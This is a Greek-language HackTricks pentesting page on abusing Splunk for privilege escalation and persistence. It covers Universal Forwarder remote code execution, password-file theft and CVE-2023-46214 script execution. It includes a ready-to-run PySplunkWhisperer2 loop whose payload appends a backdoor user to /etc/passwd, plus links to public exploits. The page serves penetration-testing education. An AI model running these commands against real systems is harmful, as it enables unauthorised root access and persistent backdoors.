Greek - Ht
HackTricks Training Twitter Linkedin Sponsor

Splunk LPE and Persistence

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν κατά την απαρίθμηση ενός μηχανήματος εσωτερικά ή εξωτερικά ανακαλύψετε ότι τρέχει Splunk (θύρα 8090), εάν τυχαία γνωρίζετε οποιαδήποτε έγκυρα διαπιστευτήρια, μπορείτε να καταχραστείτε την υπηρεσία Splunk για να εκτελέσετε ένα κέλυφος ως ο χρήστης που εκτελεί το Splunk. Εάν το root το εκτελεί, μπορείτε να αναβαθμίσετε τα δικαιώματα σε root.

Επίσης, εάν είστε ήδη root και η υπηρεσία Splunk δεν ακούει μόνο στο localhost, μπορείτε να κλέψετε το αρχείο κωδικών πρόσβασης από την υπηρεσία Splunk και να αποκρυπτογραφήσετε τους κωδικούς πρόσβασης ή να προσθέσετε νέα διαπιστευτήρια σε αυτό. Και να διατηρήσετε τη μόνιμη παραμονή στον υπολογιστή.

Στην πρώτη εικόνα παρακάτω μπορείτε να δείτε πώς φαίνεται μια ιστοσελίδα Splunkd.

Εκμετάλλευση Πράκτορα Splunk Universal Forwarder

Για περισσότερες λεπτομέρειες, ανατρέξτε στην ανάρτηση https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Αυτό είναι απλώς ένα σύνοψη:

Επισκόπηση Εκμετάλλευσης: Μια εκμετάλλευση που στοχεύει τον πράκτορα Splunk Universal Forwarder (UF) επιτρέπει σε επιτιθέμενους με τον κωδικό πράκτορα να εκτελούν αυθαίρετο κώδικα σε συστήματα που εκτελούν τον πράκτορα, πιθανώς διακινδυνεύοντας ολόκληρο το δίκτυο.

Κύρια Σημεία:

  • Ο πράκτορας UF δεν επικυρώνει τις εισερχόμενες συνδέσεις ή την αυθεντικότητα του κώδικα, καθιστώντας τον ευάλωτο σε μη εξουσιοδοτημένη εκτέλεση κώδικα.

  • Οι κοινές μεθόδοι απόκτησης κωδικών περιλαμβάνουν την εντοπισμό τους σε καταλόγους δικτύου, κοινόχρηστους φακέλους ή εσωτερική τεκμηρίωση.

  • Η επιτυχής εκμετάλλευση μπορεί να οδηγήσει σε πρόσβαση σε επίπεδο SYSTEM ή root σε παραβιασμένους υπολογιστές, διαρροή δεδομένων και περαιτέρω διείσδυση στο δίκτυο.

Εκτέλεση Εκμετάλλευσης:

  1. Ο επιτιθέμενος αποκτά τον κωδικό πράκτορα UF.

  2. Χρησιμοποιεί το API του Splunk για να στείλει εντολές ή σενάρια στους πράκτορες.

  3. Οι πιθανές ενέργειες περιλαμβάνουν εξαγωγή αρχείων, διαχείριση λογαριασμών χρηστών και παραβίαση του συστήματος.

Επίδραση:

  • Πλήρης παραβίαση του δικτύου με δικαιώματα επιπέδου SYSTEM/root σε κάθε υπολογιστή.

  • Δυνατότητα απενεργοποίησης της καταγραφής για να αποφευχθεί η ανίχνευση.

  • Εγκατάσταση πίσω πόρτας ή κρυπτογραφικού ιού.

Παράδειγμα Εντολής για Εκμετάλλευση:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Χρησιμοποιήσιμες δημόσιες εκμεταλλεύσεις:

  • https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2

  • https://www.exploit-db.com/exploits/46238

  • https://www.exploit-db.com/exploits/46487

Κατάχρηση ερωτημάτων Splunk

Για περισσότερες λεπτομέρειες, ανατρέξτε στην ανάρτηση https://blog.hrncirik.net/cve-2023-46214-analysis

Το CVE-2023-46214 επέτρεπε το ανέβασμα ενός αυθαίρετου σεναρίου στο $SPLUNK_HOME/bin/scripts και στη συνέχεια εξηγούσε ότι χρησιμοποιώντας το ερώτημα αναζήτησης |runshellscript script_name.sh ήταν δυνατή η εκτέλεση του σεναρίου που είχε αποθηκευτεί εκεί.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

PreviousSocket Command InjectionNextSSH Forward Agent exploitation

Last updated